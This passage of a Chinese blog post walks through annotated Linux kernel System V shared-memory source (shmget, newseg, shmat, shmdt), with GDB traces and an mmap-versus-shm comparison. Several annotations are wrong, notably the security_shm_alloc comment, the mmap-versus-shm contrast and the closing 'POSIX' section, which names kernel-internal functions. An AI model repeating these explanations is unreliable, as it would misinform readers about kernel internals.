	int (*more_checks)(struct kern_ipc_perm *, struct ipc_params *);
};

long ksys_shmget(key_t key, size_t size, int shmflg)
{
	struct ipc_namespace *ns;
	static const struct ipc_ops shm_ops = {
		.getnew = newseg,
		.associate = security_shm_associate,
		.more_checks = shm_more_checks,
	}; /* 初始化"创建例程" */
	struct ipc_params shm_params;

	ns = current->nsproxy->ipc_ns; /* 获取当前IPC命名空间 */

	shm_params.key = key; /* 键值 */
	shm_params.flg = shmflg; /* 标识符 */
	shm_params.u.size = size; /* 大小 */

	return ipcget(ns, &shm_ids(ns), &shm_ops, &shm_params); /* 核心函数 */
}

int ipcget(struct ipc_namespace *ns, struct ipc_ids *ids,
			const struct ipc_ops *ops, struct ipc_params *params)
{
	if (params->key == IPC_PRIVATE) /* 是否私有 */
		return ipcget_new(ns, ids, ops, params); /* 创建一个新的ipc对象 */
	else
		return ipcget_public(ns, ids, ops, params); /* 获取一个ipc对象或创建一个新对象 */
}

static int ipcget_public(struct ipc_namespace *ns, struct ipc_ids *ids,
		const struct ipc_ops *ops, struct ipc_params *params)
{
    // *ns: ipc命名空间
    // *ids: ipc标识符集
    // *ops: 要调用的实际创建例程
    // *params: 它的参数
	struct kern_ipc_perm *ipcp;
	int flg = params->flg;
	int err;

	/*
	 * Take the lock as a writer since we are potentially going to add
	 * a new entry + read locks are not "upgradable"
	 */
	down_write(&ids->rwsem);
	ipcp = ipc_findkey(ids, params->key); /* 通过key值查找一个ids对象 */
	if (ipcp == NULL) { 
		if (!(flg & IPC_CREAT)) /* IPC_CREAT:如果内核中不存在键值与key相等的共享内存,则新建一个共享内存 */
			err = -ENOENT;
		else
			err = ops->getnew(ns, params); /* 新建一个共享内存 */
	} else {
		if (flg & IPC_CREAT && flg & IPC_EXCL) /* IPC_CREAT|IPC_EXCL:如果存在key值相同的共享内存则报错 */
			err = -EEXIST;
		else {
			err = 0;
			if (ops->more_checks)
				err = ops->more_checks(ipcp, params);
			if (!err)
				/* ipc_check_perms returns the IPC id on success */
				err = ipc_check_perms(ns, ipcp, ops, params); 
		}
		ipc_unlock(ipcp);
	}
	up_write(&ids->rwsem);

	return err;
}

前面这些可以说是 “共享内存”，“信号量”，“消息队列” 的通用部分，只是 ipc_ops 结构体的初始化不同
这里其实运用了面向对象的思想，用一系列函数和数据结构来描述 IPC 这个类（只是没法单独定义为一个类而已）
函数 newseg 的源码如下：（创建一个新的共享内存）

static int newseg(struct ipc_namespace *ns, struct ipc_params *params)
{
    // *ns: 命名空间
    // *params: 指向包含key和msgflg的结构体(ipc_params)
	key_t key = params->key;
	int shmflg = params->flg;
	size_t size = params->u.size;
	int error;
	struct shmid_kernel *shp;
	size_t numpages = (size + PAGE_SIZE - 1) >> PAGE_SHIFT;
	struct file *file;
	char name[13];
	vm_flags_t acctflag = 0;

	if (size < SHMMIN || size > ns->shm_ctlmax)
		return -EINVAL;

	if (numpages << PAGE_SHIFT < size)
		return -ENOSPC;

	if (ns->shm_tot + numpages < ns->shm_tot ||
			ns->shm_tot + numpages > ns->shm_ctlall)
		return -ENOSPC;

	shp = kvmalloc(sizeof(*shp), GFP_KERNEL); /* 为shmid_kernel分配内核堆空间 */
	if (unlikely(!shp))
		return -ENOMEM;

	shp->shm_perm.key = key; /* 设置shmid_kernel->shm_perm(参数) */
	shp->shm_perm.mode = (shmflg & S_IRWXUGO);
	shp->mlock_user = NULL;

	shp->shm_perm.security = NULL;
	error = security_shm_alloc(&shp->shm_perm); /* 将shmid_kernel添加到消息队列基数树中,并取回基数树id */
	if (error) {
		kvfree(shp);
		return error;
	}

	sprintf(name, "SYSV%08x", key); /* PS:在GDB中使用"vmmap"命令就可以看到name */
	if (shmflg & SHM_HUGETLB) { /* SHM_HUGETLB:大页面映射 */
		struct hstate *hs;
		size_t hugesize;

		hs = hstate_sizelog((shmflg >> SHM_HUGE_SHIFT) & SHM_HUGE_MASK); /* 生成状态日志 */
		if (!hs) {
			error = -EINVAL;
			goto no_file;
		}
		hugesize = ALIGN(size, huge_page_size(hs)); /* 对齐 */

		/* hugetlb_file_setup applies strict accounting */
		if (shmflg & SHM_NORESERVE)
			acctflag = VM_NORESERVE;
		file = hugetlb_file_setup(name, hugesize, acctflag,
				  &shp->mlock_user, HUGETLB_SHMFS_INODE,
				(shmflg >> SHM_HUGE_SHIFT) & SHM_HUGE_MASK); /* 启用严格记账 */
	} else {
		/*
		 * Do not allow no accounting for OVERCOMMIT_NEVER, even
		 * if it's asked for.
		 */
		if  ((shmflg & SHM_NORESERVE) &&
				sysctl_overcommit_memory != OVERCOMMIT_NEVER)
			acctflag = VM_NORESERVE;
		file = shmem_kernel_file_setup(name, size, acctflag); /* 会在shmem文件系统里面创建一个文件 */
        /* 会创建新的shmem文件对应的dentry和inode,并将它们两个关联起来,然后分配一个struct file结构来表示新的shmem文件 */
	}
	error = PTR_ERR(file);
	if (IS_ERR(file))
		goto no_file;

	shp->shm_cprid = get_pid(task_tgid(current)); /* 获取pid */
	shp->shm_lprid = NULL;
	shp->shm_atim = shp->shm_dtim = 0;
	shp->shm_ctim = ktime_get_real_seconds();
	shp->shm_segsz = size;
	shp->shm_nattch = 0;
	shp->shm_file = file;
	shp->shm_creator = current;

	/* ipc_addid() locks shp upon success. */
	error = ipc_addid(&shm_ids(ns), &shp->shm_perm, ns->shm_ctlmni); /* 新创建的shmid_kernel结构挂到shm_ids里面的基数树上 */
	if (error < 0)
		goto no_id;

	list_add(&shp->shm_clist, &current->sysvshm.shm_clist); /* 插入shm链表 */

	/*
	 * shmid gets reported as "inode#" in /proc/pid/maps.
	 * proc-ps tools use this. Changing this will break them.
	 */
	file_inode(file)->i_ino = shp->shm_perm.id;

	ns->shm_tot += numpages;
	error = shp->shm_perm.id;

	ipc_unlock_object(&shp->shm_perm);
	rcu_read_unlock();
	return error;

no_id:
	ipc_update_pid(&shp->shm_cprid, NULL);
	ipc_update_pid(&shp->shm_lprid, NULL);
	if (is_file_hugepages(file) && shp->mlock_user)
		user_shm_unlock(size, shp->mlock_user);
	fput(file);
	ipc_rcu_putref(&shp->shm_perm, shm_rcu_free); /* 释放目标 */
	return error;
no_file:
	call_rcu(&shp->shm_perm.rcu, shm_rcu_free);
	return error;
}

接下来看一下 shmem_kernel_file_setup 生成文件的过程：（新创建的 struct file 则专门用于做内存映射）

struct file *shmem_kernel_file_setup(const char *name, loff_t size, unsigned long flags)
{
	return __shmem_file_setup(shm_mnt, name, size, flags, S_PRIVATE);
}

static struct file *__shmem_file_setup(struct vfsmount *mnt, const char *name, loff_t size,
				       unsigned long flags, unsigned int i_flags)
{
	struct inode *inode;
	struct file *res;

	if (IS_ERR(mnt))
		return ERR_CAST(mnt);

	if (size < 0 || size > MAX_LFS_FILESIZE)
		return ERR_PTR(-EINVAL);

	if (shmem_acct_size(flags, size))
		return ERR_PTR(-ENOMEM);

	inode = shmem_get_inode(mnt->mnt_sb, NULL, S_IFREG | S_IRWXUGO, 0,
				flags); /* 分配一个inode并进行一系列的初始化设置 */
	if (unlikely(!inode)) {
		shmem_unacct_size(flags, size);
		return ERR_PTR(-ENOSPC);
	}
	inode->i_flags |= i_flags;
	inode->i_size = size;
	clear_nlink(inode);	/* It is unlinked */
	res = ERR_PTR(ramfs_nommu_expand_for_mapping(inode, size));
	if (!IS_ERR(res))
		res = alloc_file_pseudo(inode, mnt, name, O_RDWR,
				&shmem_file_operations); /* 基于inode分配一个file(伪) */
	if (IS_ERR(res))
		iput(inode);
	return res;
}

除了生成新的一个文件（这并不是真正的文件，而是 保存在内存上 的抽象文件，这也是 shm 和 mmap 根本上的不同点），newseg 还会在内核堆空间中创建一个重要的结构体
结构体 shmid_kernel，用于管理 shmget 生成的共享内存段：

struct shmid_kernel /* private to the kernel */
{
	struct kern_ipc_perm	shm_perm;
	struct file		*shm_file;
	unsigned long		shm_nattch;
	unsigned long		shm_segsz;
	time64_t		shm_atim;
	time64_t		shm_dtim;
	time64_t		shm_ctim;
	struct pid		*shm_cprid;
	struct pid		*shm_lprid;
	struct user_struct	*mlock_user;

	/* The task created the shm object.  NULL if the task is dead. */
	struct task_struct	*shm_creator;
	struct list_head	shm_clist;	/* list by creator */
} __randomize_layout;

shmat 和 shmdt 都依靠另一个重要的结构体 - shm_file_data：

struct shm_file_data {
	int id;
	struct ipc_namespace *ns;
	struct file *file;
	const struct vm_operations_struct *vm_ops;
};

映射共享内存的核心函数 shmat：

► 0x7ffff7ee1199 <shmat+9>        syscall  <SYS_shmat>
       shmid: 0x24
       shmaddr: 0x0
       shmflg: 0x0

shmat 底层会调用 do_shmat：

long do_shmat(int shmid, char __user *shmaddr, int shmflg,
	      ulong *raddr, unsigned long shmlba)
{
	struct shmid_kernel *shp;
	unsigned long addr = (unsigned long)shmaddr;
	unsigned long size;
	struct file *file, *base;
	int    err;
	unsigned long flags = MAP_SHARED;
	unsigned long prot;
	int acc_mode;
	struct ipc_namespace *ns;
	struct shm_file_data *sfd;
	int f_flags;
	unsigned long populate = 0;

	err = -EINVAL;
	if (shmid < 0)
		goto out;

	if (addr) { /* shmaddr不为空(不常用) */
		if (addr & (shmlba - 1)) {
			if (shmflg & SHM_RND) {
				addr &= ~(shmlba - 1);  /* round down */

				/*
				 * Ensure that the round-down is non-nil
				 * when remapping. This can happen for
				 * cases when addr < shmlba.
				 */
				if (!addr && (shmflg & SHM_REMAP))
					goto out;
			} else
#ifndef __ARCH_FORCE_SHMLBA
				if (addr & ~PAGE_MASK)
#endif
					goto out;
		}

		flags |= MAP_FIXED;
	} else if ((shmflg & SHM_REMAP)) 
		goto out;

	if (shmflg & SHM_RDONLY) { /* SHM_RDONLY:为只读模式 */
		prot = PROT_READ;
		acc_mode = S_IRUGO;
		f_flags = O_RDONLY;
	} else {
		prot = PROT_READ | PROT_WRITE;
		acc_mode = S_IRUGO | S_IWUGO;
		f_flags = O_RDWR;
	}
	if (shmflg & SHM_EXEC) { /* SHM_EXEC:指定对共享内存段的执行权限 */
		prot |= PROT_EXEC;
		acc_mode |= S_IXUGO;
	}

	/*
	 * We cannot rely on the fs check since SYSV IPC does have an
	 * additional creator id...
	 */
	ns = current->nsproxy->ipc_ns;
	rcu_read_lock();
	shp = shm_obtain_object_check(ns, shmid); /* 通过共享内存的shmid,在基数树中找到对应的struct shmid_kernel结构 */
	if (IS_ERR(shp)) {
		err = PTR_ERR(shp);
		goto out_unlock;
	}

	err = -EACCES;
	if (ipcperms(ns, &shp->shm_perm, acc_mode))
		goto out_unlock;

	err = security_shm_shmat(&shp->shm_perm, shmaddr, shmflg);
	if (err)
		goto out_unlock;

	ipc_lock_object(&shp->shm_perm);

	/* check if shm_destroy() is tearing down shp */
	if (!ipc_valid_object(&shp->shm_perm)) {
		ipc_unlock_object(&shp->shm_perm);
		err = -EIDRM;
		goto out_unlock;
	}

	/*
	 * We need to take a reference to the real shm file to prevent the
	 * pointer from becoming stale in cases where the lifetime of the outer
	 * file extends beyond that of the shm segment.  It's not usually
	 * possible, but it can happen during remap_file_pages() emulation as
	 * that unmaps the memory, then does ->mmap() via file reference only.
	 * We'll deny the ->mmap() if the shm segment was since removed, but to
	 * detect shm ID reuse we need to compare the file pointers.
	 */
	base = get_file(shp->shm_file); /* 找到shmem上的内存文件base */
	shp->shm_nattch++;
	size = i_size_read(file_inode(base)); /* 获取shm_file的size */
	ipc_unlock_object(&shp->shm_perm);
	rcu_read_unlock();

	err = -ENOMEM;
	sfd = kzalloc(sizeof(*sfd), GFP_KERNEL); /* 为shm_file_data分配内存 */
	if (!sfd) {
		fput(base);
		goto out_nattch;
	}

	file = alloc_file_clone(base, f_flags,
			  is_file_hugepages(base) ?
				&shm_file_operations_huge :
				&shm_file_operations); 
    /* 拷贝一个struct file实例,同样将其private_data字段的值设置为inode->i_pipe的值 */
	err = PTR_ERR(file);
	if (IS_ERR(file)) {
		kfree(sfd);
		fput(base);
		goto out_nattch;
	}

	sfd->id = shp->shm_perm.id;
	sfd->ns = get_ipc_ns(ns);
	sfd->file = base;
	sfd->vm_ops = NULL;
	file->private_data = sfd;

	err = security_mmap_file(file, prot, flags);
	if (err)
		goto out_fput;

	if (down_write_killable(&current->mm->mmap_sem)) {
		err = -EINTR;
		goto out_fput;
	}

	if (addr && !(shmflg & SHM_REMAP)) {
		err = -EINVAL;
		if (addr + size < addr)
			goto invalid;

		if (find_vma_intersection(current->mm, addr, addr + size))
			goto invalid;
	}

	addr = do_mmap_pgoff(file, addr, size, prot, flags, 0, &populate, NULL); /* 内存分配核心函数(在mmap的底层也会调用) */
	*raddr = addr;
	err = 0;
	if (IS_ERR_VALUE(addr))
		err = (long)addr;
invalid:
	up_write(&current->mm->mmap_sem);
	if (populate)
		mm_populate(addr, populate);

out_fput:
	fput(file);

out_nattch:
	down_write(&shm_ids(ns).rwsem);
	shp = shm_lock(ns, shmid);
	shp->shm_nattch--;
	if (shm_may_destroy(ns, shp))
		shm_destroy(ns, shp);
	else
		shm_unlock(shp);
	up_write(&shm_ids(ns).rwsem);
	return err;

out_unlock:
	rcu_read_unlock();
out:
	return err;
}

其实 do_shmat 底层申请内存的部分和 mmap 一样，至于 do_mmap_pgoff 已经在之前的博客中已经分析过了
PS：因为 do_mmap_pgoff 的底层还是调用了 do_mmap，所以可以通过 do_munmap 释放该内存，函数 shmdt 底层就是利用了这一点

解除共享内存的核心函数 shmdt：

1 2	► 0x7ffff7ee11c9 <shmdt+9> syscall <SYS_shmdt> shmaddr: 0x7ffff7ffb000 ◂— 0x0

shmdt 底层会调用 ksys_shmdt：

long ksys_shmdt(char __user *shmaddr)
{
	struct mm_struct *mm = current->mm;
	struct vm_area_struct *vma;
	unsigned long addr = (unsigned long)shmaddr;
	int retval = -EINVAL;
#ifdef CONFIG_MMU
	loff_t size = 0;
	struct file *file;
	struct vm_area_struct *next;
#endif

	if (addr & ~PAGE_MASK)
		return retval;

	if (down_write_killable(&mm->mmap_sem))
		return -EINTR;

	/*
	 * This function tries to be smart and unmap shm segments that
	 * were modified by partial mlock or munmap calls:
	 * - It first determines the size of the shm segment that should be
	 *   unmapped: It searches for a vma that is backed by shm and that
	 *   started at address shmaddr. It records it's size and then unmaps
	 *   it.
	 * - Then it unmaps all shm vmas that started at shmaddr and that
	 *   are within the initially determined size and that are from the
	 *   same shm segment from which we determined the size.
	 * Errors from do_munmap are ignored: the function only fails if
	 * it's called with invalid parameters or if it's called to unmap
	 * a part of a vma. Both calls in this function are for full vmas,
	 * the parameters are directly copied from the vma itself and always
	 * valid - therefore do_munmap cannot fail. (famous last words?)
	 */
	/*
	 * If it had been mremap()'d, the starting address would not
	 * match the usual checks anyway. So assume all vma's are
	 * above the starting address given.
	 */
	vma = find_vma(mm, addr); /* 根据一个属于某个进程的虚拟地址,找到其所属的进程虚拟区间,并返回相应的vma_area_struct结构体指针 */

#ifdef CONFIG_MMU
	while (vma) {
		next = vma->vm_next;

		/*
		 * Check if the starting address would match, i.e. it's
		 * a fragment created by mprotect() and/or munmap(), or it
		 * otherwise it starts at this address with no hassles.
		 */
		if ((vma->vm_ops == &shm_vm_ops) &&
			(vma->vm_start - addr)/PAGE_SIZE == vma->vm_pgoff) {

			/*
			 * Record the file of the shm segment being
			 * unmapped.  With mremap(), someone could place
			 * page from another segment but with equal offsets
			 * in the range we are unmapping.
			 */
			file = vma->vm_file;
			size = i_size_read(file_inode(vma->vm_file));
			do_munmap(mm, vma->vm_start, vma->vm_end - vma->vm_start, NULL); /* 释放调用do_mmap生成的内存空间 */
			/*
			 * We discovered the size of the shm segment, so
			 * break out of here and fall through to the next
			 * loop that uses the size information to stop
			 * searching for matching vma's.
			 */
			retval = 0;
			vma = next;
			break;
		}
		vma = next;
	}

	/*
	 * We need look no further than the maximum address a fragment
	 * could possibly have landed at. Also cast things to loff_t to
	 * prevent overflows and make comparisons vs. equal-width types.
	 */
	size = PAGE_ALIGN(size);
	while (vma && (loff_t)(vma->vm_end - addr) <= size) {
		next = vma->vm_next;

		/* finding a matching vma now does not alter retval */
		if ((vma->vm_ops == &shm_vm_ops) &&
		    ((vma->vm_start - addr)/PAGE_SIZE == vma->vm_pgoff) &&
		    (vma->vm_file == file))
			do_munmap(mm, vma->vm_start, vma->vm_end - vma->vm_start, NULL); /* 释放调用do_mmap生成的内存空间 */
		vma = next;
	}

#else	/* CONFIG_MMU */
	/* under NOMMU conditions, the exact address to be destroyed must be
	 * given
	 */
	if (vma && vma->vm_start == addr && vma->vm_ops == &shm_vm_ops) {
		do_munmap(mm, vma->vm_start, vma->vm_end - vma->vm_start, NULL); /* 释放调用do_mmap生成的内存空间 */
		retval = 0;
	}

#endif

	up_write(&mm->mmap_sem);
	return retval;
}

内核开发人员已经把遍历释放的过程写好注释了，这些操作要么为了安全，要么为了效率

mmap VS shm

mmap 的机制：
- 就是在磁盘上建立一个文件，每个进程存储器里面，单独开辟一个空间来进行映射，如果多进程的话，那么不会对实际的内存消耗太大
- 数据保存到实际硬盘，实际存储并没有反映到主存上（不耗内存，但速度慢）
shm 的机制：
- 每个进程的共享内存都直接映射到内存里面
- 数据保存到内存中，实际的储存量直接反映到主存上（速度快，但耗内存）

令我好奇的一点是：不管是 shm 还是 mmap 底层都要依靠文件（匿名的 mmap 底层也会使用 /dev/zero 文件）

mmap 直接使用文件来存储数据
shm 利用文件来完成映射

另外匿名管道也会使用 alloc_file_pseudo 来生成一个“抽象文件”，并使用它进行数据传输

其实这也可以理解，因为 file 中管理的 inode 直接和内存相关，并且 file->f_op 中还会提供许多与驱动程序相关的内核函数（例如：在 do_mmap_pgoff 的调用链中会使用 file->f_op->get_unmapped_area）

POSIX 共享内存

传统的 systemV 的 shm 共享内存有个升级版的 API：

1
2
3

static void shm_open(struct vm_area_struct *vma); /* 在/dev/shm/下建立一个文件,作为该进程的共享内存 */
static void shm_close(struct vm_area_struct *vma); /* 释放目标共享内存 */
static void shm_destroy(struct ipc_namespace *ns, struct shmid_kernel *shp); /* 销毁/dev/shm/中对应的文件 */